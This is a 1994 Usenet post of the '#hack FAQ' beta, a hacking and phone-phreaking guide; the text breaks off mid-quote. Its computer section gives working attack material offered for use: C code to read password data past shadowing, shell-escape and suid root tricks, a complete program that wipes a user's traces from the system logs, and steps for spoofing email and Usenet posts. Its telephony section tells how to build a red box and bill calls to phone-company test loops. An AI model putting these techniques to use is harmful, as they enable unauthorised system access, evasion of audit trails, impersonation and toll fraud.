From tmok!paperboy.ids.net!uunet!spool.mu.edu!bloom-beacon.mit.edu!ai-lab!will Mon Jul 18 16:23:19 1994
Path: tmok!paperboy.ids.net!uunet!spool.mu.edu!bloom-beacon.mit.edu!ai-lab!will
From: will@gnu.ai.mit.edu (Will Spencer)
Newsgroups: alt.2600
Subject: #hack FAQ Beta .005
Date: 16 Jul 1994 17:17:03 GMT
Organization: Free Software Foundation / Cambridge, MA  USA
Lines: 1339
Message-ID: <3094mfINN3d7@life.ai.mit.edu>
NNTP-Posting-Host: spiff.gnu.ai.mit.edu


Editors Note: Welcome to another beta release of the #hack FAQ!
              This release features several improvements over .004,
              although there is still much work to be done.
 
              I may even run a spell checker over this thing before
              the next release!
 
              Please send constructive feedback to
              will@gnu.ai.mit.edu.  Flames to d_d@opus.tymnet.com.
 
              Many sections are missing or incomplete.  The #hack FAQ
              comes with no warranties, express or implied.
 
 
              
 
 
                                 ** BETA **
 
				#Hack F.A.Q.
				    by
				  Voyager
                            will@gnu.ai.mit.edu
 
                          With special thanks to:
 
            A-Flat, Al, Aleph1, Bluesman, C-Curve, Edison, KCrow,
              Major, Presence, Rogue Agent, sbin and TheSaint.
 
                            Beta Revision .005
 
 
Section A: Computers
 
01. How do I access the password file under Unix?
02. How do I crack Unix passwords?
03. How do I access the password file under VMS?
04. How do I crack VMS passwords?
05. What is NIS/yp?
06. What is password shadowing?
07. How do I break out of a restricted shell?
08. How do I gain root from a suid script or program?
09. How do I erase my presence from the system logs?
10. How do I send fakemail?
11. How do I fake posts to UseNet?
12. How do I hack ChanOp on IRC?
13. How do I modify the IRC client to hide my real username?
14. What is a trojan/worm/virus/logic bomb?
15. How can I protect myself from virii and such?
16. What is Cryptoxxxxxxx?
17. What is PGP?
18. What is Tempest?
 
 
Section B: Telephony
 
01. What is a Red Box?
02. How do I build a Red Box?
03. Which payphones will a Red Box work on?
04. What is a Blue Box?
05. Do Blue Boxes still work?
06. What is a Black Box?
07. What do all the colored boxes do?
08. What is the ANAC number for my area?
09. What is a ringback number?
10. What is the ringback number for my area?
11. What is a loop?
12. What is a loop in my area?
13. What is a CNA number?
14. What is the telephone company CNA number for my area?
15. What is scanning?
16. Is scanning illegal?
 
 
Section C: Resources
 
01. What are some ftp sites of interest to hackers?
02. What are some newsgroups of interest to hackers?
03. What are some telnet sites of interest to hackers?
04. What are some gopher sites of interest to hackers?
05. What are some World wide Web (WWW) sites of interest to hackers?
06. What are some IRC channels of interest to hackers?
07. What are some BBS's of interest to hackers?
08. What books are available on this subject?
 
 
Section D: Miscellaneous
 
01. What does XXX stand for?
 
 
 
Section A: Computers
~~~~~~~~~~~~~~~~~~~~
 
01. How do I access the password file under Unix?
 
In standard Unix the password file is /etc/passwd.  On a Unix system
with either NIS/yp or password shadowing, much of the password data
may be elsewhere.
 
 
02. How do I crack Unix passwords?
 
Contrary to popular belief, Unix passwords cannot be decrypted.  Unix
passwords are encrypted with a one way function.  The login program
encrypts the text you enter at the "password:" prompt and compares
that encrypted string against the encrypted form of your password.
 
Password cracking software uses wordlists.  Each word in the wordlist
is encrypted with each of the 4096 possible salt values and the
results are compared to the encrypted form of the target password.
 
The best cracking program for Unix passwords is currently Crack by
Alec Muffett.  For PC-DOS, the best package to use is currently
CrackerJack.
 
 
03. How do I access the password file under VMS?
 
Under VMS, the password file is SYS$SYSTEM:SYSUAF.DAT.  However,
unlike Unix, most users do not have access to read the password file.
 
 
04. How do I crack VMS passwords?
 
Write a program that uses the SYS$GETUAF functions to compare the
results of encrypted words against the encrypted data in SYSUAF.DAT.
 
Two such programs are known to exist, CHECK_PASSWORD and
GUESS_PASSWORD.
 
 
05. What is NIS/yp?
 
NIS (Network Information System) in the current name for what was once
known as yp (Yellow Pages).  The purpose for NIS is to allow many
machies on a network to share configuration information, including
password data. NIS is not designed to promote system security.  If
your system uses NIS you will have a very short /etc/passwd file with
a line that looks like this:
 
+::0:0:::
 
To view the real password file use this command "ypcat passwd"
 
 
06. What is password shadowing?
 
Password shadowing is a security system where the encrypted password
field of /etc/password is replaced with a special token and the
encrypted password is stored in a seperate file which is not readable
by normal system users.
 
To defeat password shadowing on many (but not all) systems, write a
program that uses successive calls to getpwent() to obtain the
password file.
 
Example:
 
#include <pwd.h>
main()
{
struct passwd *p;
while(p=getpwent())
printf("%s:%s:%d:%d:%s:%s:%s\n", p->pw_name, p->pw_passwd,
p->pw_uid, p->pw_gid, p->pw_gecos, p->pw_dir, p->pw_shell);
}
 
 
07. How do I break out of a restricted shell?
 
On poorly implemented restricted shells you can break out of the
restricted environment by running a program that features a shell
function.  A good example is vi.  Run vi and use this command:
 
:set shell=/bin/sh
 
then shell using this command:
 
:shell
 
 
08. How do I gain root from a suid script or program?
 
1. Change IFS.
 
If the program calls any other programs using the system() function
call, you may be able to fool it by changing IFS.  IFS is the Internal
Field Seperator that the shell uses to delimit arguments.
 
If the program contains a line that looks like this:
 
system("/bin/date")
 
and you change IFS to '/' the shell will them interpret the
proceeding line as:
 
bin date
 
Now, if you have a program of your own in the path called "bin" the
suid program will run your program instead of /bin/date.
 
To change IFS, use this command:
 
set IFS '/'
 
 
2. link the script to -i
 
Create a symbolic link named "-i" to the program.  Running "-i"
will cause the interpreter shell (/bin/sh) to start up in interactive
mode.  This only works on suid shell scripts.
 
Example:
 
% ln suid.sh -i
% -i
#
 
 
3. Exploit a race condition
 
Replace a symbolic link to the program with another program while the
kernel is loading /bin/sh.
 
Example:
 
nice -19 suidprog ; ln -s evilprog suidroot
 
 
4. Send bad input the the program.
 
Invoke the name of the program and a seperate command on the same
command line.
 
Example:
 
suidprog ; id
 
 
09. How do I erase my presence from the system logs?
 
Edit /etc/utmp, /usr/adm/wtmp and /usr/adm/lastlog. These are not text
files that can be edited by hand with vi, you must use a program
specifically written for this purpose.
 
Example:
 
#include <sys/types.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/file.h>
#include <fcntl.h>
#include <utmp.h>
#include <pwd.h>
#include <lastlog.h>
#define WTMP_NAME "/usr/adm/wtmp"
#define UTMP_NAME "/etc/utmp"
#define LASTLOG_NAME "/usr/adm/lastlog"
 
int f;
 
void kill_utmp(who)
char *who;
{
    struct utmp utmp_ent;
 
  if ((f=open(UTMP_NAME,O_RDWR))>=0) {
     while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 )
       if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
                 bzero((char *)&utmp_ent,sizeof( utmp_ent ));
                 lseek (f, -(sizeof (utmp_ent)), SEEK_CUR);
                 write (f, &utmp_ent, sizeof (utmp_ent));
            }
     close(f);
  }
}
 
void kill_wtmp(who)
char *who;
{
    struct utmp utmp_ent;
    long pos;
 
    pos = 1L;
    if ((f=open(WTMP_NAME,O_RDWR))>=0) {
 
     while(pos != -1L) {
        lseek(f,-(long)( (sizeof(struct utmp)) * pos),L_XTND);
        if (read (f, &utmp_ent, sizeof (struct utmp))<0) {
          pos = -1L;
        } else {
          if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
               bzero((char *)&utmp_ent,sizeof(struct utmp ));
               lseek(f,-( (sizeof(struct utmp)) * pos),L_XTND);
               write (f, &utmp_ent, sizeof (utmp_ent));
               pos = -1L;
          } else pos += 1L;
        }
     }
     close(f);
  }
}
 
void kill_lastlog(who)
char *who;
{
    struct passwd *pwd;
    struct lastlog newll;
 
     if ((pwd=getpwnam(who))!=NULL) {
 
        if ((f=open(LASTLOG_NAME, O_RDWR)) >= 0) {
            lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0);
            bzero((char *)&newll,sizeof( newll ));
            write(f, (char *)&newll, sizeof( newll ));
            close(f);
        }
 
    } else printf("%s: ?\n",who);
}
 
main(argc,argv)
int argc;
char *argv[];
{
    if (argc==2) {
        kill_lastlog(argv[1]);
        kill_wtmp(argv[1]);
        kill_utmp(argv[1]);
        printf("Zap2!\n");
    } else
    printf("Error.\n");
}
 
 
10. How do I send fakemail?
 
Telnet to port 25 of the machine you want the mail to appear to
originate from.  Enter your message as in this example:
 
 HELO bellcore.com
 MAIL FROM:Voyagor@bellcore.com
 RCPT TO:clinton@whitehouse.gov
 DATA
 
	Please discontinue your silly Clipper initiative.
.
QUIT
 
On systems that have RFC 931 implemented, spoofing your "MAIL FROM:"
line will not work.  Test by sending yourself fakemail first.
 
 
11. How do I fake posts to UseNet?
 
Use inews to post.  Give inews the following lines:
 
From:
Newsgroups:
Subject:
Message-ID:
Date:
Organization:
 
For a moderated newsgroup, inews will also require this line:
 
Approved:
 
Then add your post and terminate with <Control-D>.
 
Example:
 
From: Dale Drew
Newsgroups: alt.2600
Subject: Please forgive me
Message-ID: <d_drew.123@tymnet.com>
Date: Fri, 13 Jun 1994 12:15:03
Organization: Tymnet Insecurity
 
Please forgive me for being such a worthless puke all of these years.
 
                                                Sincerely,
 
                                                        Bartman
^D
 
 
12. How do I hack ChanOp on IRC?
 
Find a server that is split from the rest of IRC and create your own
channel there using the name of the channel you want ChanOp on.  When
that server reconnects to the net, you will have ChanOp on the real
channel.  If you have ServerOp on a server, you can cause it to split
on purpose.
 
 
13. How do I modify the IRC client to hide my real username?
 
Get the IRC client from cs.bu.edu /irc/clients.  Look at the source
code files irc.c and ctcp.c.  The code you are looking for is fairly
easy to spot.  Change it. Change the username code in irc.c and the
ctcp information code in ctcp.c.  Compile and run your client.
 
 
14. What is a trojan/worm/virus/logic bomb?
 
Trojan:     An independent program that appears to perform a useful
            function but that hides another unauthorized program
            inside it.  When an authorized user performs the apparrent
            function, the trojan horse performs the unauthorized
            function as well (often usurping the priveleges of the
            user).
 
Virus:      A code fragment (not an independent program) that
            reproduces by attaching to another program.  It may damage
            data directly, or it may degrade system performance by
            taking over system resources which are then not available
            to authorized users.
 
Worm:       An independent program that reproduces by copying itself
            from one system to another, usually over a network.  Like
            a virus, a worm may damage data directly, or it may
            degrade system performace by tying up system resources and
            even shutting down a network.
 
Logic Bomb: A method for releasing a system attack of some kind.  It
            is triggered when a particular condition (e.g., a certain
            date or system operation) occurs.
 
 
15. How can I protect myself from virii and such?
 
 
16. What is Cryptoxxxxxxx?
 
This FAQ answer is excerpted from: Computer Security Basics
                                   by Deborah Russell
                                   and G.T. Gengemi Sr.
 
 
A message is called either plaintext or cleartext.  The process of
disguising a message in such a way as to hide its substance is called
encryption.  An encrypted message is called ciphertext.  The process
of turning ciphertext back into plaintext is called decryption.
 
The art and science of keeping messages secure is called cryptography,
and it is practiced by cryptographers.  Cryptanalysts are
practitioners of cryptanalysis, the art and science of breaking
ciphertext, i.e. seeing through the disguise.  The branch of
mathematics embodying both cryptography and cryptanalysis is called
cryptology, and it's practitioners are called cryptologists.
 
 
17. What is PGP?
 
This FAQ answer is excerpted from: PGP(tm) User's Guide
                                   Volume I: Essential Topics
                                   by Philip Zimmermann
 
PGP(tm) uses public-key encryption to protect E-mail and data files.
Communicate securely with people you've never met, with no secure
channels needed for prior exchange of keys.  PGP is well featured and
fast, with sophisticated key management, digital signatures, data
compression, and good ergonomic design.
 
Pretty Good(tm) Privacy (PGP), from Phil's Pretty Good Software, is a
high security cryptographic software application for MSDOS, Unix,
VAX/VMS, and other computers.  PGP allows people to exchange files or
messages with privacy, authentication, and convenience.  Privacy means
that only those intended to receive a message can read it.
Authentication means that messages that appear to be from a particular
person can only have originated from that person. Convenience means
that privacy and authentication are provided without the hassles of
managing keys associated with conventional cryptographic software.  No
secure channels are needed to exchange keys between users, which makes
PGP much easier to use.  This is because PGP is based on a powerful
new technology called "public key" cryptography.
 
PGP combines the convenience of the Rivest-Shamir-Adleman (RSA)
public key cryptosystem with the speed of conventional cryptography,
message digests for digital signatures, data compression before
encryption, good ergonomic design, and sophisticated key management. 
And PGP performs the public-key functions faster than most other
software implementations.  PGP is public key cryptography for the
masses.
 
 
18. What is Tempest?
 
Computers and other electonic equipment release interference to their
surrounding environment.  You may observe this by placing two video
monitors close together.  The pictures will behave erratically until
you space them apart.
 
Although most of the time these emissions are simply annoyances, they
can sometimes be very helpful.  Suppose we wanted to see what project
a target was working on.  We could sit in a van outside her office and
use sensitive electonic equipment to attempt to pick up and decipher
the emanations from her video monitor.
 
Our competetor, however, could shield the emanations from her
equipment or use equipment without strong emanations.
 
Tempest is the US Government program for evaluation and endorsement
of electronic equipment that is safe from eavesdropping.
 
 
Section B: Telephony
~~~~~~~~~~~~~~~~~~~~
 
01. What is a Red Box?
 
When a coin is inserted into a payphone, the phone emits a set of
tones.  A red box is a device that simulates those tones, with the
purpose of fooling the payphone into believing you have inserted an
actual coin.
 
 
02. How do I build a Red Box?
 
Red boxes are commonly manufactured from modified Radio Shack tone
dialers, Hallmark greeting cards, or made from scratch from readily
available electronic components.
 
To make a Red Box from a Radio Shack 43-146 tone dialer, open the
dialer and replace the crystal (the largest shiny metal component)
with a crystal close to 6.5Mhz.  The most popular choice is the
6.5536Mhz crystal.  When you are finished, program the P1 button with
five *'s.  That will simulate a quarter tone.
 
 
03. Which payphones will a Red Box work on?
 
Red Boxes will work on TelCo owned payphones, but not on COCOT's
(Customer Owned Coin Operated Telephones).
 
 
04. What is a Blue Box?
 
Blue boxes use a 2600hz tone to convince telephone switches that use
in-band signalling that the caller is actually a telephone operator.
The caller may then access special switch functions, with the usual
purpose of making free long distance phone calls, using the
Multi-Frequency tones provided by the Blue Box.
 
 
05. Do Blue Boxes still work?
 
Blue Boxes still work in areas using in-band signalling.  Modern phone
signalling switches using ESS (Electronic Signalling Systems) use
out-of-band-signalling.  Nothing you send over the voice portion of
bandwidth can control the switch.
 
 
06. What is a Black Box?
 
A Black Box is a 10k ohm resistor placed across your phone line to
cause the phone company equipment to be unable to detect that you have
answered your telephone.  People who call you will then not be billed
for the telephone call.
 
 
07. What do all the colored boxes do?
 
Acrylic      Steal Three-Way-Calling, Call Waiting and programmable
             Call Forwarding on old 4-wire phone systems
Aqua         Drain the voltage of the FBI lock-in-trace/trap-trace
Beige        Lineman's hand set
Black        Allows the calling party to not be billed for the call
             placed
Blast        Phone microphone amplifier
Blotto       Supposedly shorts every fone out in the immediate area
Blue         Emulate a true operator by siezing a trunk with a 2600hz
             tone
Brown        Create a party line from 2 phone lines
Bud          Tap into your neighbors phone line
Chartreuse   Use the electricity from your phone line
Cheese       Connect two phones to create a divertor
Chrome       Manipulate Traffic Signals by Remote Control
Clear        A telephone pickup coil and a small amp use to make free
             calls on Fortress Phones
Color        Line activated telephone recorder
Copper       Cause crosstalk interference on an extender
Crimson      Hold button
Dark         Re-route outgoing or incoming calls to another phone
Dayglo       Connect to your neighbors phone line
Divertor     Re-route outgoing or incoming calls to another phone
DLOC         Create a party line from 2 phone lines
Gold         Trace calls, tell if the call is being traced, and can
             change a trace
Green        Emulate the Coin Collect, Coin Return, and Ringback tones
Infinity     Remotely activated phone tap
Jack         Touch-Tone key pad
Light        In-use light
Lunch        AM transmitter
Magenta      Connect a remote phone line to another remote phone line
Mauve        Phone tap without cutting into a line
Neon         External microphone
Noise        Create line noise
Olive        External ringer
Party        Create a party line from 2 phone lines
Pearl        Tone generator
Pink         Create a party line from 2 phone lines
Purple       Telephone hold button
Rainbow      Kill a trace by putting 120v into the phone line (joke)
Razz         Tap into your neighbors phone
Red          Make free phone calls from pay phones by generating
             quarter tones
Rock         Add music to your phone line
Scarlet      Cause a neighbors phone line to have poor reception
Silver       Create the DTMF tones for A, B, C and D
Static       Keep the voltage on a phone line high
Switch       Add hold, indicator lights, conferencing, etc..
Tan          Line activated telephone recorder
Tron         Reverse the phase of power to your house, causing your
             electric meter to run slower
TV Cable     "See" sound waves on your TV
Urine        Create a capacitative disturbance between the ring and
             tip wires in another's telephone headset
Violet       Keep a payphone from hanging up
White        Portable DTMF keypad
Yellow       Add an extension phone
 
 
08. What is the ANAC number for my area?
 
How to find your ANAC number:
 
Look up your NPA (Area Code) and try the number listed for it. If that
fails, try 1 plus the number listed for it.  If that fails, try the
common numbers like 311, 958 and 200-222-2222. If that fails, try the
nationwide ANAC number 404-988-9664. If you find the ANAC number for
your area, please let us know.
 
Note that many times the ANAC number will vary for different
switches in the same city.
 
A trick to getting the number of the phone line you are calling from
is to call an (800) phone sex line.  Example: (800)571-8859.  These
systems will give you an account number, which in many cases includes
the telephone number of the phone from which you are calling.
 
Another useful 800 ANAC number is the Duke Power Company Automated
Outage System at (800)769-3766.  The system will read back to you
the phone number from which you are calling.
 
Please use local ANAC numbers if you can, as abuse or overuse kills
800 ANAC numbers.
 
NPA  ANAC number      Comments
---  ---------------  ---------------------------------------------
201  958              Hackensack/Jersey City/Newark/Paterson, NJ
202  958-xxxx         Dictrict of Columbia
203  960              CT (All)
203  970              CT (All)
204  644-xxxx         Manitoba
205  908-222-2222     Birmingham, AL
206  411              WA /* Not US West */
207  958              ME (All)
209  830              Stockton, CA
212  958              Manhattan, NY
213  114              Los Angeles, CA
213  1223             Los Angeles, CA /* some 1AESS switches */
213  211-2345         Los Angeles, CA /* English response */
213  211-2346         Los Angeles, CA /* DTMF response */
213  61056            Los Angeles, CA
214  790              Dallas, TX /* GTE */
214  970-222-2222     Dallas, TX
214  970-611-1111     Dallas, TX /* Southwestern Bell */
215  410-xxxx         Philadelphia, PA
217  200-xxx-xxxx     Champaign-Urbana/Springfield, IL
301  958-9968         Hagerstown/Rockville, MD
305  200-222-2222     Ft. Lauderdale/Key West/Miami, FL
309  200-xxx-xxxx     Peoria/Rock Island, IL
310  114              Long Beach, CA /* on many GTE switches */
310  1223             Long Beach, CA /* some 1AESS switches */
310  211-2345         Long Beach, CA /* English response */
310  211-2346         Long Beach, CA /* DTMF response */
312  1-200-5863       Chicago, IL
312  200-xxx-xxxx     Chicago, IL
312  290              Chicago, IL
313  200-200-2002     Ann Arbor/Dearborn/Detroit, MI
313  200-222-2222     Ann Arbor/Dearborn/Detroit, MI
313  200-xxx-xxxx     Ann Arbor/Dearborn/Detroit, MI
313  200200200200200  Ann Arbor/Dearborn/Detroit, MI
314  511              Columbia/Jefferson City, MO
317  310-222-2222     Indianapolis/Kokomo, IN
317  743-1218         Indianapolis/Kokomo, IN
401  222-2222         RI (All)
402  311              Lincoln, NE
403  311              Alberta, Yukon and N.W. Territory
403  908-222-2222     Alberta, Yukon and N.W. Territory
403  999              Alberta, Yukon and N.W. Territory
404  311              Atlanta, GA
404  940-xxx-xxxx     Atlanta, GA
405  897              Enid/Oklahoma City, OK
407  200-222-2222     Orlando/West Palm Beach, FL
408  300-xxx-xxxx     San Jose, CA
408  760              San Jose, CA
408  940              San Jose, CA
409  951              Beaumont/Galveston, TX
409  970-xxxx         Beaumont/Galveston, TX
410  200-555-1212     Annapolis/Baltimore, MD
410  811              Annapolis/Baltimore, MD
412  711-6633         Pittsburgh, PA
412  711-4411         Pittsburgh, PA
412  999-xxxx         Pittsburgh, PA
413  958              Pittsfield/Springfield, MA
413  200-555-5555     Pittsfield/Springfield, MA
414  330-2234         Fond du Lac/Green Bay/Milwaukee/Racine, WI
415  200-555-1212     San Francisco, CA
415  211-2111         San Francisco, CA
415  2222             San Francisco, CA
415  640              San Francisco, CA
415  760-2878         San Francisco, CA
415  7600-2222        San Francisco, CA
419  311              Toledo, OH
502  997-555-1212     Frankfort/Louisville/Paducah/Shelbyville, KY
503  611              Portland, OR  /* not all parts of town */
508  958              Fall River/New Bedford/Worchester, MA
508  200-222-1234     Fall River/New Bedford/Worchester, MA
508  200-222-2222     Fall River/New Bedford/Worchester, MA
509  560              Spokane/Walla Walla/Yakima, WA
512  200-222-2222     Austin/Corpus Christi, TX
512  830              Austin/Corpus Christi, TX
512  970-xxxx         Austin/Corpus Christi, TX
514  320-xxxx         Montreal, Quebec
515  5463             Des Moines, IA
516  958              Hempstead/Long Island, NY
516  968              Hempstead/Long Island, NY
517  200-222-2222     Bay City/Jackson/Lansing, MI
517  200200200200200  Bay City/Jackson/Lansing, MI
518  997              Albany/Schenectady/Troy, NY
518  998              Albany/Schenectady/Troy, NY
602  593-0809         Phoenix, AZ
602  593-6017         Phoenix, AZ
602  593-7451         Phoenix, AZ
603  200-222-2222     NH (All)
606  997-555-1212     Ashland/Winchester, KY
607  993              Binghamton/Elmira, NY
609  958              Atlantic City/Camden/Trenton/Vineland, NJ
612  511              Minneapolis/St.Paul, MN
615  200200200200200  Nashville, TN
615  830              Nashville, TN
616  200-222-2222     Battle Creek/Grand Rapids/Kalamazoo, MI
617  200-222-1234     Boston, MA
617  200-222-2222     Boston, MA
617  200-444-4444     Boston, MA /* Woburn, MA */
617  220-2622         Boston, MA
617  958              Boston, MA
618  200-xxx-xxxx     Alton/Cairo/Mt.Vernon, IL
708  1-200-xxxx       Chicago/Elgin, IL
713  970-xxxx         Houston, TX
714  211-2121         Anaheim, CA /* GTE */
716  511              Buffalo/Niagra Falls/Rochester, NY /* Rochester Tel */
717  958              Harrisburg/Scranton/Wilkes-Barre, PA
718  958              Bronx/Brooklyn/Queens/Staten Island, NY
802  2-222-222-2222   Vermont (All)
802  200-222-2222     Vermont (All)
805  830              San Luis Obispo, CA
806  970-xxxx         Amarillo/Lubbock, TX
810  200200200200200  Michigan
812  410-555-1212     Evansville, IN
815  200-xxx-xxxx     La Salle/Rockford, IL
815  290              La Salle/Rockford, IL
817  211              Ft. Worth/Waco, TX
817  970-611-1111     Ft. Worth/Waco, TX  /* Southwestern Bell */
818  1223             Pasadena, CA /* some 1AESS switches */
818  211-2345         Pasadena, CA /* English response */
818  211-2346         Pasadena, CA /* DTMF response */
906  200-222-2222     Marquette/Sault Ste. Marie, MI
908  958              New Brunswick, NJ
910  311              Fayetteville/Greensboro/Raliegh/Winston-Salem, NC
914  990-1111         Peekskill/Poughkeepsie/White Plains/Yonkers, NY
915  970-xxxx         Abilene/El Paso, TX
919  711              Durham, NC
 
 
Canada:
306  115              Saskatchewan, Canada
416  410-xxxx         Toronto, Ontario
416  997-xxxx         Toronto, Ontario
519  320-xxxx         London, Ontario
604  1116             British Columbia, Canada
604  1211             British Columbia, Canada
604  211              British Columbia, Canada
613  320-2232         Ottawa, Ontario
705  320-xxxx         Saulte Ste. Marie, Ontario
 
Australia:
+61  03-552-4111      Victoria 03 area
+61  19123            All major capital cities
 
 
09. What is a ringback number?
 
A ringback number is a number that you call that will immediately
ring the telephone from which it was called.
 
In most instances you must call the ringback number, quickly hang up
the phone for just a short moment and then let up on the switch, you
will then go back off hook and hear a different tone.  You may then
hang up.  You will be called back seconds later.
 
 
10. What is the ringback number for my area?
 
203  991-xxxx         CT (All)
209  890-xxxx         Stockton, CA
213  1-95x-xxxx       Los Angeles, CA
303  99X-xxxx         Grand Junction, CO
312  200-xxxx         Chicago, IL
412  985-xxxx         Pittsburgh, PA
416  57x-xxxx         Toronto, Ontario
416  99x-xxxx         Toronto, Ontario
416  999-xxx-xxxx     Toronto, Ontario
502  988              Lexington, KY
512  95X-xxxx         Austin, TX
514  320-xxxx         Montreal, Quebec
601  777-xxxx         MS (All)
619  331-xxxx         San Diego, CA
619  332-xxxx         San Diego, CA
716  981-xxxx         Rochester, NY /* Rochester Tel */
801  938-xxxx         Utah (All)
801  939-xxxx         Utah (All)
 
 
11. What is a loop?
 
This FAQ answer is excerpted from: ToneLoc v0.99 User Manual
                                   by Minor Threat & Mucho Maas
 
Loops are a pair of phone numbers, usually consecutive, like 836-9998
and 836-9999.  They are used by the phone company for testing.  What
good do loops do us?  Well, they are cool in a few ways.  Here is a
simple use of loops.  Each loop has two ends, a 'high' end, and a
'low' end.  One end gives a (usually) constant, loud tone when it is
called. The other end is silent.  Loops don't usually ring either.
When BOTH ends are called, the people that called each end can talk
through the loop.  Some loops are voice filtered and won't pass
anything but a constant tone; these aren't much use to you.  Here's
what you can use working loops for:  billing phone calls!  First, call
the end that gives the loud tone.  Then if the operator or someone
calls the other end, the tone will go quiet.  Act like the phone just
rang and you answered it ... say "Hello", "Allo", "Chow", "Yo", or
what the fuck ever.  The operator thinks that she just called you, and
that's it!  Now the phone bill will go to the loop, and your local
RBOC will get the bill!  Use this technique in moderation, or the loop
may go down.  Loops are probably most useful when you want to talk to
someone to whom you don't want to give your phone number.
 
 
12. What is a loop in my area?
 
Many of these loops are no longer functional.  If you are local
to any of these loops, please try them out an e-mail me the results
of your research.
 
NPA    High      Low
---  --------  --------
201  228-9929  228-9930
201  238-9929  238-9930
201  251-9929  251-9930
201  254-9929  254-9930
201  272-9929  272-9930
201  330-9929  330-9930
201  333-9929  333-9930
201  339-9929  339-9930
201  347-9929  347-9930
201  376-9929  376-9930
201  398-9929  398-9930
201  467-9929  467-9930
201  528-9929  528-9930
201  558-9929  558-9930
201  559-9929  559-9930
201  560-9929  560-9930
201  592-9929  592-9930
201  625-9929  625-9930
201  631-9929  631-9930
201  637-9929  637-9930
201  655-9929  655-9930
201  666-9929  666-9930
201  690-9929  690-9930
201  761-9929  761-9930
201  762-9929  762-9929
201  762-9929  762-9930
201  762-9929  762-9929
201  763-9929  763-9930
201  764-9929  764-9930
201  767-9929  767-9930
201  768-9929  768-9930
201  773-9929  773-9930
201  879-9929  879-9930
201  946-9929  946-9930
201  992-9929  992-9930
201  993-9929  993-9930
201  994-9929  994-9930
212  352-9900  352-9906
213  360-1118  360-1119
213  365-1118  365-1119
213  455-0002  455-xxxx
213  455-0002  455-XXXX
213  546-0002  546-XXXX
213  546-0002  546-xxxx
305  778-9952  778-9951
305  964-9951  964-9952
312  222-9973  222-9974
312  234-9973  234-9974
313  224-9996  224-9997
313  225-9996  225-9997
313  234-9996  234-9997
313  237-9996  237-9997
313  256-9996  256-9997
313  272-9996  272-9997
313  273-9996  273-9997
313  277-9996  277-9997
313  281-9996  281-9997
313  292-9996  292-9997
313  299-9996  299-9997
313  321-9996  321-9997
313  326-9996  326-9997
313  356-9996  356-9997
313  362-9996  362-9997
313  369-9996  369-9997
313  388-9996  388-9997
313  397-9996  397-9997
313  399-9996  399-9997
313  445-9996  445-9997
313  465-9996  465-9997
313  471-9996  471-9997
313  474-9996  474-9997
313  477-9996  477-9997
313  478-9996  478-9997
313  483-9996  483-9997
313  497-9996  497-9997
313  526-9996  526-9997
313  552-9996  552-9997
313  556-9996  556-9997
313  561-9996  561-9997
313  569-9996  569-9996
313  575-9996  575-9997
313  577-9996  577-9997
313  585-9996  585-9997
313  591-9996  591-9997
313  621-9996  621-9997
313  626-9996  626-9997
313  644-9996  644-9997
313  646-9996  646-9997
313  647-9996  647-9997
313  649-9996  649-9997
313  663-9996  663-9997
313  665-9996  665-9997
313  683-9996  683-9997
313  721-9996  721-9997
313  722-9996  722-9997
313  728-9996  728-9997
313  731-9996  731-9997
313  751-9996  751-9997
313  776-9996  776-9997
313  781-9996  781-9997
313  787-9996  787-9997
313  822-9996  822-9997
313  833-9996  833-9997
313  851-9996  851-9997
313  871-9996  871-9997
313  875-9996  875-9997
313  886-9996  886-9997
313  888-9996  888-9997
313  898-9996  898-9997
313  934-9996  934-9997
313  942-9996  942-9997
313  963-9996  963-9997
313  977-9996  977-9997
313  995-9996  995-9997
402  422-0001  422-0002
402  422-0005  422-0006
402  422-0007  422-0008
402  422-0003  422-0004
402  422-0005  422-0006
402  422-0007  422-0008
402  422-0009  ALL-PREF
402  422-0003  422-0004
402  422-0009  ALL-PREF
402  422-0001  422-0002
402  572-0003  572-0004
517  422-9996  422-9997
517  423-9996  423-9997
517  455-9996  455-9997
517  563-9996  563-9997
517  663-9996  663-9997
517  851-9996  851-9997
609  921-9929  921-9930
609  994-9929  994-9930
616  997-9996  997-9997
616  ALL-PREF  ALL-PREF
713  224-1499  759-1799
713  324-1499  324-1799
713  339-1499  339-1799
713  342-1499  342-1799
713  351-1499  351-1799
713  354-1499  354-1799
713  356-1499  356-1799
713  442-1499  442-1799
713  447-1499  447-1799
713  455-1499  455-1799
713  458-1499  458-1799
713  462-1499  462-1799
713  466-1499  466-1799
713  468-1499  468-1799
713  469-1499  469-1799
713  471-1499  471-1799
713  481-1499  481-1799
713  482-1499  482-1799
713  484-1499  484-1799
713  487-1499  487-1799
713  489-1499  489-1799
713  492-1499  492-1799
713  493-1499  493-1799
713  524-1499  524-1799
713  526-1499  526-1799
713  555-1499  555-1799
713  661-1499  661-1799
713  664-1499  664-1799
713  665-1499  665-1799
713  666-1499  666-1799
713  667-1499  667-1799
713  682-1499  976-1799
713  771-1499  771-1799
713  780-1499  780-1799
713  781-1499  997-1799
713  960-1499  960-1799
713  977-1499  977-1799
713  988-1499  988-1799
714  535-1118  535-1119
714  538-1118  538-1119
714  858-1118  858-1119
714  879-1118  879-1119
805  528-0044  528-0045
805  544-0044  544-0045
805  773-0044  773-0045
813  385-9971
908  776-9930  776-9930
 
 
13. What is a CNA number?
 
CNA stands for Customer Name and Address.  The CNA number is a phone
number for telephone company personnel to call and get the name and
address for a phone number.  If a telephone lineman finds a phone line
he does not recognize, he can use the ANI number to find it's phone
number and then call the CNA operator to see who owns it and where
they live.
 
Normal CNA numbers are available only to telephone company personnel.
Private citizens may now legally get CNA information from private
companies.  Two such companies are:
 
Unidirectory    (900)933-3330
Telename        (900)884-1212
 
Note that these are 900 numbers, and will cost you approximately one
dollar per minute.
 
 
14. What is the telephone company CNA number for my area?
 
614  614-464-0123
 
 
15. What is scanning?
 
Scanning is dialing a large number of telephone numbers in the hope
of finding interesting carriers (computers) or tones.
 
Scanning can be done by hand, although dialing several thousand
telephone numbers by hand is extremely boring and takes a long time.
 
Much better is to use a scanning program, sometimes called a war
dialer or a demon dialer.  Currently, the best war dialer available
to PC-DOS users is ToneLoc .99b8.
 
A war dialer will dial a range of numbers and log what it finds at
each number.  You can then only dial up the numbers that the war
dialer marked as carriers or tones.
 
 
16. Is scanning illegal?
 
Excerpt from: 2600, Spring 1990, Page 27:
 
-BQ-
In some places, scanning has been made illegal.  It would be hard,
though, for someone to file a complaint against you for scanning since
